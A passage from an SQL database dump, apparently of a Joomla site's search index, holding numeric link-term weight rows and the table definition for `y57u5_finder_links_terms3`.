(299, 321113, 0.93331),
(299, 321114, 0.91),
(299, 321115, 0.95669),
(299, 321116, 0.95669),
(299, 321117, 1.00331),
(299, 321118, 1.02669),
(299, 321119, 0.95669),
(299, 321120, 0.95669),
(299, 321121, 1.02669),
(304, 324159, 1.00331),
(305, 324159, 1.00331),
(304, 324166, 1.02669),
(305, 324166, 2.05338),
(304, 324172, 1.07331),
(305, 324172, 1.07331),
(305, 324174, 1.05),
(304, 324174, 2.1),
(304, 325056, 1.00331),
(304, 325057, 0.84),
(304, 325058, 0.95669),
(304, 325059, 7.79019),
(304, 325060, 1.00331),
(304, 325061, 0.37331),
(304, 325062, 1.00331),
(304, 325063, 1.19),
(304, 325064, 1.86662),
(304, 325065, 2.00662),
(304, 325066, 3.21993),
(304, 325067, 1.16669),
(304, 325068, 1.16669),
(304, 325069, 1.19),
(304, 325070, 1.09669),
(304, 325071, 1.19),
(304, 325072, 0.88669),
(304, 325073, 1.05),
(304, 325074, 0.91),
(304, 325075, 1.02669),
(304, 325076, 0.95669),
(304, 325077, 1.07331),
(304, 325078, 1.00331),
(304, 325079, 1.05),
(304, 325080, 1.07331),
(304, 325081, 0.23331),
(304, 325082, 1.02669),
(304, 325083, 1.12),
(304, 325139, 0.86331),
(304, 325140, 0.95669),
(304, 325141, 1.02669),
(304, 325142, 1.00331),
(304, 325143, 2.33338),
(304, 325144, 1.82),
(304, 325145, 2.38),
(304, 325146, 0.84),
(304, 325147, 0.95669),
(304, 325148, 1.07331),
(304, 325149, 1.21331),
(304, 325150, 0.98),
(304, 325151, 1.02669),
(304, 325152, 0.91),
(304, 325153, 0.95669),
(304, 325154, 0.93331),
(306, 325155, 0.28),
(304, 325155, 0.42),
(304, 325156, 0.86331),
(304, 325157, 0.93331),
(304, 325158, 2.1),
(304, 325159, 1.09669),
(304, 325160, 1.19),
(304, 325161, 0.23331),
(304, 325162, 0.98),
(304, 325163, 1.09669),
(305, 326151, 1.07331),
(305, 326152, 1.14331),
(305, 326153, 0.98),
(305, 326154, 1.12),
(305, 326155, 0.98),
(305, 326156, 1.00331),
(305, 326157, 1.09669),
(305, 326158, 0.93331),
(305, 326159, 1.02669),
(305, 326160, 0.91),
(305, 326161, 1.00331),
(305, 326162, 1.02669),
(305, 326163, 5.4668),
(305, 326164, 2.32339),
(305, 326165, 0.91),
(305, 326166, 0.91),
(305, 326167, 1.00331),
(305, 326168, 0.86331),
(305, 326169, 1.02669),
(305, 326170, 0.84),
(305, 326171, 0.95669),
(305, 326172, 0.84),
(305, 326173, 1.02669),
(305, 326174, 1.00331),
(305, 326175, 1.05),
(305, 326176, 1.05),
(305, 326177, 0.86331),
(305, 326178, 0.91),
(305, 326179, 0.93331),
(305, 326180, 0.88669),
(305, 326181, 0.93331),
(305, 326182, 0.86331),
(305, 326183, 0.93331),
(305, 326184, 2.00662),
(305, 326185, 2.14662),
(305, 326186, 1.00331),
(305, 326187, 0.98),
(305, 326188, 1.05),
(305, 326189, 1.09669),
(305, 326190, 1.05),
(305, 326191, 1.16669),
(305, 326192, 1.00331),
(305, 326193, 1.00331),
(305, 326194, 1.00331),
(305, 326195, 1.00331),
(305, 326196, 1.02669),
(305, 326197, 1.16669),
(305, 326198, 1.05),
(305, 326199, 1.02669),
(305, 326200, 1.21331),
(305, 326201, 1.07331),
(305, 326202, 1.12),
(305, 326203, 1.09669),
(305, 326204, 1.09669),
(305, 326292, 0.95669),
(305, 326293, 0.98),
(305, 326294, 1.07331),
(305, 326295, 0.93331),
(305, 326296, 0.84),
(305, 326297, 0.91),
(305, 326298, 0.86331),
(305, 326299, 1.05),
(305, 326300, 1.05),
(305, 326301, 1.00331),
(305, 326302, 0.98),
(305, 326303, 1.00331),
(305, 326304, 1.09669),
(305, 326305, 0.28),
(305, 326306, 0.98),
(305, 326307, 1.16669),
(305, 326308, 0.93331),
(305, 326309, 1.05),
(305, 326310, 0.84),
(305, 326311, 0.91),
(305, 326312, 0.98),
(305, 326313, 1.05),
(305, 326314, 1.14331),
(305, 326315, 3.45324),
(305, 326316, 0.95669),
(305, 326317, 0.95669),
(305, 326318, 0.95669),
(305, 326319, 0.95669),
(305, 326320, 0.91),
(305, 326321, 0.95669),
(306, 327469, 2.19338),
(306, 327470, 0.88669),
(306, 327471, 1.00331),
(306, 327472, 0.88669),
(306, 327473, 0.95669),
(306, 327474, 1.00331),
(306, 327475, 0.32669),
(306, 327476, 0.98),
(306, 327477, 1.07331),
(306, 327478, 1.82),
(306, 327479, 2.33338),
(306, 327480, 1.35331),
(306, 327481, 1.23669),
(306, 327482, 1.09669),
(306, 327483, 1.02669),
(306, 327484, 1.05),
(306, 327485, 0.88669),
(306, 327486, 1.07331),
(306, 327487, 1.05),
(306, 327488, 1.12),
(306, 327489, 0.98),
(306, 327490, 1.07331),
(306, 327491, 1.09669),
(306, 327492, 1.4),
(306, 327493, 0.88669),
(306, 327494, 1.05),
(306, 327495, 0.86331),
(306, 327496, 0.98),
(306, 327497, 1.12),
(306, 327498, 1.00331),
(306, 327499, 1.14331),
(306, 327500, 0.91),
(306, 327501, 1.09669),
(306, 327502, 1.02669),
(306, 327503, 1.00331),
(306, 327504, 0.98),
(306, 327505, 1.05),
(306, 327506, 0.93331),
(306, 327507, 1.14331),
(306, 327508, 0.93331),
(306, 327509, 1.00331),
(306, 327510, 1.02669),
(306, 327511, 1.07331),
(306, 327512, 0.98),
(306, 327513, 1.14331),
(306, 327514, 0.95669),
(306, 327515, 0.91),
(306, 327516, 1.05),
(306, 327517, 0.93331),
(306, 327518, 1.00331),
(306, 327519, 1.77338),
(306, 327520, 0.95669),
(306, 327521, 0.98),
(306, 327522, 2.33345),
(306, 327523, 1.02669),
(306, 327524, 1.14331),
(306, 327525, 0.98),
(306, 327526, 1.07331),
(306, 327527, 1.00331),
(306, 327528, 1.16669),
(306, 327529, 1.05),
(306, 327530, 1.14331),
(306, 327531, 1.07331),
(306, 327532, 1.19),
(306, 327533, 0.86331),
(306, 327534, 1.07331),
(306, 327535, 0.95669),
(306, 327536, 1.02669),
(306, 327537, 0.91),
(306, 327538, 0.98),
(306, 327539, 0.86331),
(306, 327540, 0.95669),
(306, 327541, 0.84),
(306, 327542, 0.93331),
(306, 327543, 0.98),
(306, 327544, 1.07331),
(306, 327545, 0.86331),
(306, 327546, 1.02669),
(306, 327547, 0.98),
(306, 327548, 0.84),
(306, 327549, 0.95669),
(306, 327550, 0.86331),
(306, 327551, 1.00331),
(306, 327552, 0.86331),
(306, 327553, 0.93331),
(306, 327554, 0.86331),
(306, 327555, 0.95669),
(306, 327556, 1.05),
(306, 327557, 0.84),
(306, 327558, 0.93331),
(306, 327559, 0.95669),
(306, 327560, 1.09669),
(306, 327561, 0.88669),
(306, 327562, 0.98),
(306, 327563, 1.05),
(306, 327564, 0.95669),
(306, 327565, 1.05),
(306, 327566, 1.05),
(306, 327567, 1.19),
(306, 327568, 0.91),
(306, 327569, 0.98),
(306, 327570, 2.00662),
(306, 327571, 1.09669),
(306, 327572, 1.09669),
(306, 327573, 0.88669),
(306, 327574, 1.00331),
(306, 327575, 1.02669),
(306, 327576, 0.93331),
(306, 327577, 1.07331),
(306, 327578, 0.93331),
(306, 327579, 1.00331),
(306, 327580, 1.05),
(306, 327581, 1.00331),
(306, 327582, 1.00331),
(306, 327583, 0.93331),
(306, 327584, 1.16669),
(306, 327740, 1.02669),
(306, 327741, 1.09669),
(306, 327742, 0.88669),
(306, 327743, 0.95669),
(306, 327744, 0.88669),
(306, 327745, 0.98),
(306, 327746, 0.98),
(306, 327747, 1.05),
(306, 327748, 1.07331),
(306, 327749, 1.16669),
(306, 327750, 0.95669),
(306, 327751, 1.00331),
(306, 327752, 7.41),
(306, 327753, 7.79019),
(306, 327754, 0.88669),
(306, 327755, 1.00331),
(306, 327756, 9.30981),
(306, 327757, 0.98),
(306, 327758, 0.98),
(306, 327759, 1.72662),
(306, 327760, 0.98),
(306, 327761, 1.00331),
(308, 328937, 0.37331),
(308, 328938, 0.95669),
(308, 328939, 1.12);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms3`
--

CREATE TABLE `y57u5_finder_links_terms3` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms3`
--

INSERT INTO `y57u5_finder_links_terms3` (`link_id`, `term_id`, `weight`) VALUES
(31, 284, 0.18669),
(159, 284, 0.18669),
(160, 284, 0.18669),
(193, 284, 0.18669),
(235, 284, 0.18669),
(238, 284, 0.18669),
(241, 284, 0.18669),
(243, 284, 0.18669),
(246, 284, 0.18669),
(250, 284, 0.18669),
(251, 284, 0.18669),
(254, 284, 0.18669),
(259, 284, 0.18669),
(260, 284, 0.18669),
(261, 284, 0.18669),
(263, 284, 0.18669),
(272, 284, 0.18669),
(275, 284, 0.18669),
(280, 284, 0.18669),
(290, 284, 0.18669),
(292, 284, 0.18669),
(298, 284, 0.18669),
(304, 284, 0.18669),
(306, 284, 0.18669),
(308, 284, 0.18669),
(239, 284, 0.37338),
(240, 284, 0.37338),
(247, 284, 0.37338),
(252, 284, 0.37338),
(265, 284, 0.37338),
(266, 284, 0.37338),
(299, 284, 0.37338),
(245, 284, 0.56007),
(256, 284, 0.56007),
(262, 284, 0.56007),
(249, 284, 0.64008),
(31, 285, 0.93331),
(159, 285, 0.93331),
(160, 285, 0.93331),
(250, 285, 0.93331),
(251, 285, 0.93331),
(31, 286, 1.07331),
(159, 286, 1.07331),
(160, 286, 1.07331),
(250, 286, 1.07331),
(251, 286, 1.07331),
(244, 12968, 0.28),
(247, 12968, 0.28),
(248, 12968, 0.28),
(252, 12968, 0.28),
(263, 12968, 0.28),
(273, 12968, 0.28),
(288, 12968, 0.28),
(247, 12969, 0.95669),
(248, 12969, 0.95669),
(252, 12969, 0.95669),
(263, 12969, 0.95669),
(273, 12969, 0.95669),
(288, 12969, 0.95669),
(174, 12970, 0.32669),
(243, 12970, 0.32669),
(252, 12970, 0.32669),
(257, 12970, 0.32669),
(258, 12970, 0.32669),
(259, 12970, 0.32669),
(260, 12970, 0.32669),
(261, 12970, 0.32669),
(265, 12970, 0.32669),
(266, 12970, 0.32669),
(304, 12970, 0.32669),
(306, 12970, 0.32669),
(174, 12971, 0.95669),
(252, 12971, 0.95669),
(306, 12971, 0.95669),
(235, 12973, 0.86331),
(252, 12973, 0.86331),
(233, 16453, 0.18669),
(235, 16453, 0.18669),
(242, 16453, 0.18669),
(243, 16453, 0.18669),
(244, 16453, 0.18669),
(247, 16453, 0.18669),
(253, 16453, 0.18669),
(258, 16453, 0.18669),
(299, 16453, 0.18669),
(246, 16453, 0.37338),
(238, 16453, 0.56007),
(233, 17331, 0.23331),
(299, 17331, 0.23331),
(193, 23566, 0.23331),
(237, 23566, 0.23331),
(239, 23566, 0.23331),
(245, 23566, 0.23331),
(248, 23566, 0.23331),
(255, 23566, 0.23331),
(258, 23566, 0.23331),
(259, 23566, 0.23331),
(260, 23566, 0.23331),
(261, 23566, 0.23331),
(262, 23566, 0.23331),
(263, 23566, 0.23331),
(264, 23566, 0.23331),
(265, 23566, 0.23331),
(266, 23566, 0.23331),
(268, 23566, 0.23331),
(270, 23566, 0.23331),
(272, 23566, 0.23331),
(275, 23566, 0.23331),
(280, 23566, 0.23331),
(288, 23566, 0.23331),
(301, 23566, 0.23331),
(304, 23566, 0.23331),
(236, 23566, 0.46662),
(238, 23566, 0.46662),
(241, 23566, 0.46662),
(253, 23566, 0.46662),
(254, 23566, 0.46662),
(267, 23566, 0.46662),
(274, 23566, 0.46662),
(292, 23566, 0.46662),
(295, 23566, 0.46662),
(174, 23566, 0.69993),
(256, 23566, 0.69993),
(269, 23566, 0.69993),
(306, 23566, 0.69993),
(246, 23566, 0.93324),
(305, 23566, 0.93324),
(243, 23566, 1.16655),
(244, 23566, 1.16655),
(273, 23566, 1.16655),
(235, 23566, 1.63317),
(242, 23566, 1.86648),
(178, 23566, 3.49965),
(299, 23566, 3.49965),
(243, 23567, 0.91),
(246, 23567, 0.91),
(299, 23567, 1.82),
(237, 23570, 0.88669),
(246, 23570, 0.88669),
(299, 23570, 0.88669),
(236, 23574, 0.93331),
(242, 23574, 0.93331),
(299, 23574, 0.93331),
(242, 23584, 0.88669),
(305, 23584, 0.88669),
(273, 23588, 0.88669),
(299, 23588, 0.88669),
(305, 23588, 0.88669),
(306, 23588, 0.88669),
(243, 23594, 0.84),
(299, 23594, 0.84),
(178, 24425, 0.18669),
(299, 24425, 0.18669),
(262, 24425, 0.37338),
(299, 24428, 0.18669),
(178, 24428, 0.37338),
(178, 24440, 0.23331),
(235, 24440, 0.23331),
(299, 24440, 0.23331),
(268, 24443, 0.46669),
(299, 24443, 0.46669),
(178, 24446, 0.23331),
(299, 24446, 0.23331),
(44, 25928, 0.9334),
(45, 25928, 0.9334),
(46, 25928, 0.9334),
(47, 25928, 0.9334),
(48, 25928, 0.9334),
(49, 25928, 0.9334),
(50, 25928, 0.9334),
(44, 25929, 2.8666),
(45, 25929, 2.8666),
(46, 25929, 2.8666),
(47, 25929, 2.8666),
(48, 25929, 2.8666),
(49, 25929, 2.8666),
(50, 25929, 2.8666),
(44, 25930, 3),
(45, 25983, 3),
(46, 25995, 3),
(47, 26011, 3),
(48, 26028, 3.0666),
(49, 26054, 3.0666),
(50, 26069, 3.0666),
(174, 36687, 0.98),
(236, 36687, 0.98),
(242, 36687, 0.98),
(244, 36687, 0.98),
(246, 36687, 0.98),
(253, 36687, 0.98),
(306, 36687, 0.98),
(235, 36687, 1.96),
(241, 36689, 0.95669),
(253, 36689, 0.95669),
(254, 36689, 0.95669),
(255, 36689, 0.95669),
(258, 36689, 0.95669),
(259, 36689, 0.95669),
(260, 36689, 0.95669),
(261, 36689, 0.95669),
(262, 36689, 0.95669),
(263, 36689, 0.95669),
(264, 36689, 0.95669),
(268, 36689, 0.95669),
(269, 36689, 0.95669),
(270, 36689, 0.95669),
(272, 36689, 0.95669),
(273, 36689, 0.95669),
(274, 36689, 0.95669),
(275, 36689, 0.95669),
(280, 36689, 0.95669),
(288, 36689, 0.95669),
(292, 36689, 0.95669),
(301, 36689, 0.95669),
(304, 36689, 0.95669),
(305, 36689, 0.95669),
(241, 36690, 1.14331),
(253, 36690, 1.14331),
(254, 36690, 1.14331),
(255, 36690, 1.14331),
(258, 36690, 1.14331),
(259, 36690, 1.14331),
(260, 36690, 1.14331),
(261, 36690, 1.14331),
(262, 36690, 1.14331),
(263, 36690, 1.14331),
(264, 36690, 1.14331),
(268, 36690, 1.14331),
(269, 36690, 1.14331),
(270, 36690, 1.14331),
(272, 36690, 1.14331),
(273, 36690, 1.14331),
(274, 36690, 1.14331),
(275, 36690, 1.14331),
(280, 36690, 1.14331),
(288, 36690, 1.14331),
(292, 36690, 1.14331),
(301, 36690, 1.14331),
(304, 36690, 1.14331),
(305, 36690, 1.14331),
(235, 51142, 0.84),
(246, 51142, 1.68),
(235, 51605, 0.18669),
(305, 51605, 0.18669),
(178, 51605, 0.74676),
(178, 51610, 0.28),
(235, 51610, 0.28),
(193, 64884, 0.93331),
(244, 64884, 0.93331),
(256, 64884, 0.93331),
(295, 64884, 0.93331),
(299, 64884, 0.93331),
(305, 64884, 0.93331),
(178, 64884, 8.39979),
(178, 64886, 0.14),
(239, 64886, 0.14),
(247, 64886, 0.14),
(256, 64886, 0.14),
(193, 64886, 0.28),
(304, 64886, 0.28),
(306, 64886, 0.28),
(193, 64887, 0.84),
(239, 64887, 0.84),
(193, 64891, 0.18669),
(255, 64891, 0.18669),
(267, 64891, 0.18669),
(254, 75751, 0.28),
(261, 75751, 0.28),
(274, 75751, 0.28),
(306, 75751, 0.28),
(267, 75751, 0.56),
(262, 75751, 1.12),
(168, 75754, 0.28),
(178, 75754, 0.28),
(246, 75754, 0.28),
(254, 75754, 0.28),
(263, 75754, 0.84),
(236, 77870, 1.00331),
(242, 77870, 1.00331),
(236, 77871, 1.12),
(244, 77871, 1.12),
(236, 77878, 0.18669),
(262, 77878, 0.18669),
(242, 92338, 0.86331),
(238, 92338, 2.58993),
(174, 92342, 0.23331),
(238, 92342, 0.23331),
(244, 92342, 0.23331),
(245, 92342, 0.23331),
(248, 92342, 0.23331),
(247, 92342, 0.46662),
(255, 102070, 0.37331),
(290, 102070, 0.37331),
(274, 102070, 1.11993),
(257, 110316, 0.93331),
(258, 110316, 0.93331),
(256, 115242, 0.28),
(273, 115242, 0.28),
(243, 115245, 0.84),
(259, 115245, 0.84),
(260, 115245, 0.84),
(262, 115245, 0.84),
(256, 115245, 1.68),
(256, 115248, 0.88669),
(265, 115248, 0.88669),
(266, 115248, 0.88669),
(256, 115687, 0.14),
(267, 115687, 0.14),
(241, 116386, 0.93331),
(242, 116386, 0.93331),
(174, 157452, 0.37331),
(243, 157452, 0.37331),
(249, 157452, 0.74662),
(258, 163792, 0.18669),
(262, 163792, 0.18669),
(246, 169150, 0.23331),
(247, 169150, 0.23331),
(242, 169150, 0.46662),
(249, 169150, 0.56661),
(242, 169162, 0.95669),
(244, 169162, 0.95669),
(259, 173602, 0.98),
(260, 173602, 0.98),
(259, 173603, 1.14331),
(260, 173603, 1.14331),
(259, 173604, 1.00331),
(260, 173604, 1.00331),
(261, 175830, 0.86331),
(263, 175830, 0.86331),
(245, 178706, 2.87007),
(249, 178706, 3.28008),
(161, 189591, 2.56),
(161, 189592, 9.6),
(161, 189593, 1.12),
(161, 189594, 10.26),
(161, 189595, 0.84),
(161, 189596, 1.12),
(161, 189597, 1.26),
(161, 189598, 1.00331),
(161, 189599, 1.12),
(161, 189600, 1.05),
(161, 189601, 1.23669),
(246, 192743, 0.86331),
(247, 192743, 0.86331),
(249, 192743, 2.09661),
(178, 193121, 0.32669),
(246, 193121, 0.32669),
(168, 198005, 0.23331),
(288, 198005, 0.23331),
(304, 198005, 0.23331),
(168, 198006, 0.95669),
(168, 198007, 1.12),
(168, 198008, 0.18669),
(247, 198008, 0.18669),
(168, 198009, 0.84),
(168, 198010, 0.88669),
(168, 198011, 0.95669),
(168, 198012, 1.05),
(174, 215479, 1.09669),
(174, 215480, 0.93331),
(174, 215481, 1.07331),
(174, 215482, 0.93331),
(174, 215483, 1.16669),
(174, 215484, 1.07331),
(174, 215485, 0.91),
(174, 215486, 1.09669),
(174, 215487, 1.00331),
(174, 215488, 1.09669),
(247, 220379, 1.07331),
(263, 220379, 1.07331),
(273, 220379, 1.07331),
(178, 221026, 0.09331),
(178, 221027, 0.84),
(178, 221028, 0.95669),
(178, 222126, 0.91),
(178, 222127, 0.95669),
(178, 222128, 0.98),
(178, 222129, 1.05),
(178, 222130, 1.14331),
(178, 222131, 2.00662),
(178, 222132, 1.4),
(178, 222133, 1.02669),
(178, 222134, 2.19338),
(178, 222135, 1.00331),
(178, 222136, 1.02669),
(178, 222137, 1.96),
(178, 222138, 1.05),
(178, 222139, 1.14331),
(178, 222140, 0.91),
(178, 222141, 1.00331),
(178, 222142, 0.84),
(178, 222143, 0.98),
(178, 222144, 0.88669),
(178, 222145, 0.93331),
(178, 222146, 0.23331),
(178, 222147, 0.88669),
(178, 222148, 1.00331),
(178, 222149, 0.56),
(178, 222150, 2.00662),
(178, 222151, 2.14662),
(178, 223240, 0.91),
(178, 223241, 1.02669),
(178, 223242, 0.86331),
(178, 223243, 1.00331),
(178, 223244, 0.86331),
(178, 223245, 0.98),
(178, 223246, 0.91),
(178, 223247, 1.00331),
(178, 223248, 0.32669),
(178, 223249, 0.95669),
(178, 223250, 1.19),
(178, 223251, 0.37331),
(178, 223252, 1.02669),
(178, 223253, 1.09669),
(178, 223254, 0.91),
(178, 223255, 0.98),
(178, 223256, 0.98),
(178, 223257, 1.19),
(178, 223258, 0.86331),
(178, 223259, 0.93331),
(178, 223260, 0.91),
(178, 223261, 1.02669),
(178, 223262, 0.14),
(178, 223263, 0.93331),
(178, 223264, 1.02669),
(178, 223265, 0.18669),
(178, 223266, 1.00331),
(178, 223267, 1.12),
(178, 223268, 0.18662),
(178, 223269, 0.84),
(178, 223270, 0.91),
(178, 223271, 0.86331),
(178, 223272, 1.02669),
(178, 223273, 0.23331),
(178, 223274, 0.95669),
(178, 223275, 1.21331),
(178, 223276, 0.14),
(178, 223277, 1.00331),
(178, 223278, 1.09669),
(178, 223279, 0.28),
(178, 223280, 0.88669),
(178, 223281, 1.02669),
(178, 223282, 0.88669),
(178, 223283, 0.98),
(178, 223284, 0.23331),
(178, 223285, 0.95669),
(178, 223286, 1.05),
(178, 223287, 0.98),
(178, 223288, 1.16669),
(178, 223289, 0.28),
(178, 223290, 0.95669),
(178, 223291, 1.05),
(178, 223292, 0.93331),
(178, 223293, 1.00331),
(178, 223294, 0.23331),
(178, 223295, 0.91),
(178, 223296, 1.05),
(178, 223297, 0.18669),
(178, 223298, 0.91),
(178, 223299, 1.05),
(247, 229019, 0.95669),
(249, 229019, 2.32339),
(247, 229028, 1.02669),
(248, 229028, 1.02669),
(248, 233557, 0.28),
(249, 233557, 0.28),
(193, 238899, 1.02669),
(193, 238900, 0.88669),
(193, 238901, 0.86331),
(193, 238902, 0.98),
(193, 238903, 0.88669),
(193, 238904, 1.00331),
(193, 238905, 0.91),
(193, 238906, 0.95669),
(270, 250542, 0.37338),
(301, 250542, 0.37338),
(270, 250543, 1.72662),
(301, 250543, 1.72662),
(270, 250544, 1.96),
(301, 250544, 1.96),
(265, 251174, 0.93331),
(266, 251174, 0.93331),
(265, 251175, 1.05),
(266, 251175, 1.05),
(265, 251176, 1.00331),
(266, 251176, 1.00331),
(265, 251177, 1.00331),
(266, 251177, 1.00331),
(265, 251178, 1.12),
(266, 251178, 1.12),
(272, 253373, 0.18669),
(280, 253373, 0.18669),
(272, 253374, 0.86331),
(280, 253374, 0.86331),
(272, 253375, 1.00331),
(280, 253375, 1.00331),
(272, 253376, 0.88669),
(280, 253376, 0.88669),
(272, 253377, 1.02669),
(280, 253377, 1.02669),
(273, 256288, 1.07331),
(273, 256289, 1.14331),
(273, 256290, 0.91),
(273, 256291, 1.02669),
(273, 256292, 0.98),
(273, 256293, 0.93331),
(273, 256294, 1.05),
(273, 256295, 0.14),
(273, 256296, 0.81669),
(273, 256297, 0.86331),
(273, 256298, 0.88669),
(273, 256299, 0.98),
(273, 256609, 0.14),
(273, 256610, 0.81669),
(273, 256611, 1.00331),
(233, 266564, 0.86331),
(233, 266565, 0.93331),
(233, 266716, 1.00331),
(233, 266717, 1.12),
(235, 267338, 0.14),
(235, 267339, 0.91),
(235, 267340, 1.00331),
(235, 267778, 1.23669),
(235, 267779, 1.09669),
(295, 267780, 0.88669),
(299, 267780, 0.88669),
(235, 267780, 3.54676),
(235, 267781, 2.1),
(235, 267782, 0.98),
(235, 267783, 1.02669),
(235, 267784, 0.95669),
(235, 267785, 1.19),
(235, 267786, 0.88669),
(235, 267787, 0.93331),
(235, 268173, 0.18669),
(235, 268174, 0.88669),
(235, 268175, 1.00331),
(235, 268176, 0.86331),
(235, 268177, 0.98),
(235, 268178, 0.88669),
(235, 268179, 1.02669),
(235, 268180, 0.91),
(235, 268181, 1.02669),
(236, 268903, 0.32669),
(236, 268904, 0.95669),
(236, 268905, 1.07331),
(236, 268906, 0.23331),
(236, 268907, 0.86331),
(236, 268908, 1.05),
(236, 268909, 0.86331),
(236, 268910, 1.00331),
(236, 269330, 0.09331),
(236, 269331, 0.88669),
(236, 269332, 1.00331),
(237, 269682, 0.98),
(237, 269940, 0.32669),
(237, 269941, 1.00331),
(237, 269942, 1.07331),
(238, 271072, 0.91),
(238, 271073, 0.98),
(238, 271074, 1.02669),
(238, 271075, 1.21331),
(238, 271076, 0.95669),
(238, 271077, 0.95669),
(238, 271078, 0.91),
(238, 271079, 0.93331),
(238, 271080, 1.02669),
(238, 271081, 0.28),
(238, 271082, 0.91),
(238, 271083, 0.95669),
(238, 271084, 0.91),
(238, 271085, 1.02669),
(239, 273135, 0.93331),
(239, 273136, 1.00331),
(239, 273137, 0.95669),
(239, 273138, 0.95669),
(239, 273139, 1.28331),
(239, 273140, 0.91),
(239, 273141, 0.98),
(240, 274501, 0.60669),
(240, 274502, 1.21331),
(240, 274503, 1.4),
(240, 275272, 0.93331),
(240, 275273, 1.07331),
(240, 275274, 0.93331),
(240, 275275, 1.05),
(241, 276938, 1.09669),
(241, 276939, 0.88669),
(241, 276940, 0.98),
(242, 278495, 1.72662),
(242, 278496, 1.82),
(242, 278497, 1.14331),
(242, 278498, 0.98),
(242, 278499, 0.95669),
(242, 278500, 1.09669),
(242, 278501, 0.93331),
(242, 278502, 1.02669),
(242, 278503, 1.00331),
(242, 278504, 1.09669),
(242, 278505, 1.05),
(242, 278506, 1.07331),
(242, 278507, 0.93331),
(242, 279635, 0.28),
(242, 279636, 0.98),
(242, 279637, 1.14331),
(242, 279638, 0.18669),
(242, 279639, 0.86331),
(242, 279640, 1.00331),
(243, 282153, 1.07331),
(243, 282154, 0.91),
(243, 282155, 1.05),
(243, 282156, 0.93331),
(243, 282157, 1.07331),
(243, 282158, 1.00331),
(243, 282159, 1.07331),
(243, 282160, 0.95669),
(243, 282161, 1.07331),
(243, 282162, 0.88669),
(243, 282163, 0.95669),
(243, 282164, 1.19),
(243, 282165, 0.95669),
(243, 282166, 1.07331),
(243, 282167, 0.98),
(244, 284075, 0.93331),
(244, 284076, 1.02669),
(244, 284077, 0.91),
(244, 284078, 1.14331),
(244, 284079, 1.09669),
(244, 284080, 0.98),
(244, 284081, 1.05),
(244, 284082, 0.84),
(244, 284083, 0.88669),
(244, 284084, 0.91),
(244, 284085, 1.02669),
(245, 284921, 0.88669),
(245, 284922, 1.05),
(245, 284923, 1.02669),
(245, 284924, 1.05),
(245, 284925, 1.02669),
(246, 285602, 1.00331),
(246, 285603, 1.02669),
(246, 285604, 0.98),
(246, 285605, 1.05),
(246, 285606, 0.98),
(246, 285607, 1.05),
(246, 285608, 0.88669),
(246, 285609, 0.93331),
(246, 285610, 0.91),
(246, 285611, 0.98),
(246, 285612, 0.98),
(246, 285613, 1.12),
(246, 285970, 1.02669),
(246, 285971, 1.12),
(246, 285972, 0.37331),
(246, 285973, 1.12),
(246, 285974, 1.16669),
(247, 286577, 0.81669),
(247, 286578, 0.93331),
(247, 286579, 0.86331),
(247, 286580, 0.93331),
(247, 286581, 0.84),
(247, 286582, 0.88669),
(247, 286583, 0.91),
(247, 286584, 1.09669),
(247, 286585, 1.12),
(247, 286586, 1.09669),
(247, 286587, 1.16669),
(247, 286588, 0.86331),
(247, 286589, 1.14331),
(248, 287532, 0.28),
(248, 287533, 0.95669),
(248, 287534, 1.07331),
(248, 287535, 1.00331),
(248, 287536, 1.14331),
(248, 287537, 1.19),
(248, 287538, 1.02669),
(248, 287539, 1.09669),
(248, 287540, 0.32669),
(248, 287541, 1.00331),
(248, 287542, 1.26),
(249, 288609, 0.93331),
(249, 288610, 1.07331),
(249, 288611, 0.93331),
(249, 288612, 1.02669),
(249, 288613, 0.95669),
(249, 288614, 1.21331),
(249, 288615, 2.43661),
(249, 288616, 1.05),
(252, 289766, 1.07331),
(252, 289767, 1.02669),
(252, 289768, 1.00331),
(252, 289769, 1.07331),
(252, 290086, 0.32669),
(252, 290087, 0.95669),
(252, 290088, 1.07331),
(253, 290552, 0.23331),
(253, 290553, 1.00331),
(253, 290841, 1.14331),
(253, 290842, 0.91),
(253, 290843, 1.05),
(253, 290844, 0.37331),
(253, 290845, 1.00331),
(253, 290846, 1.09669),
(253, 290847, 0.23331),
(253, 290848, 0.91),
(253, 290849, 1.12),
(254, 292036, 0.88669),
(254, 292037, 1.02669),
(254, 292038, 0.18669),
(290, 292038, 0.18669),
(295, 292038, 0.18669),
(305, 292038, 0.18669),
(254, 292039, 0.88669),
(290, 292039, 0.88669),
(254, 292040, 1.00331),
(254, 292041, 1.02669),
(254, 292042, 1.14331),
(254, 292043, 0.93331),
(254, 292044, 1.02669),
(254, 292045, 0.93331),
(254, 292046, 1.02669),
(254, 292581, 0.32669),
(254, 292582, 0.93331),
(254, 292583, 1.00331),
(255, 292819, 0.93331),
(255, 292820, 1.07331),
(255, 292821, 0.91),
(255, 292822, 0.98),
(256, 293388, 1.09669),
(256, 293389, 0.93331),
(256, 293390, 1.02669),
(256, 293391, 0.88669),
(256, 293392, 1.14331),
(256, 293393, 0.93331),
(256, 293394, 1.09669),
(256, 293395, 1.05),
(256, 293396, 1.09669),
(256, 293397, 0.98),
(256, 293774, 0.14),
(256, 293775, 0.84),
(256, 293776, 0.95669),
(256, 293777, 0.88669),
(256, 293778, 1.00331),
(256, 293779, 0.23331),
(256, 293780, 0.95669),
(256, 293781, 1.05),
(257, 294415, 1.05),
(258, 295425, 0.86331),
(258, 295426, 0.95669),
(258, 295427, 1.09669),
(258, 295853, 0.23331),
(258, 295854, 0.86331),
(258, 295855, 1.00331),
(258, 295856, 0.91),
(258, 295857, 1.07331),
(261, 296609, 0.95669),
(261, 296610, 1.21331),
(261, 296611, 0.93331),
(261, 296612, 0.98),
(261, 296613, 0.98),
(262, 297263, 0.14),
(262, 297264, 0.84),
(262, 297265, 1.02669),
(262, 297710, 1.02669),
(262, 297711, 1.16669),
(262, 297712, 0.95669),
(262, 297713, 1.14331),
(262, 297714, 0.95669),
(262, 297715, 1.07331),
(262, 297716, 0.93331),
(262, 297717, 1.09669),
(262, 297718, 0.86331),
(262, 297719, 0.98),
(262, 297720, 0.95669),
(262, 297721, 1.02669),
(262, 297722, 1.16669),
(262, 297723, 0.88669),
(262, 297724, 1.00331),
(262, 298324, 0.86331),
(262, 298325, 1.07331),
(262, 298326, 0.88669),
(262, 298327, 1.07331),
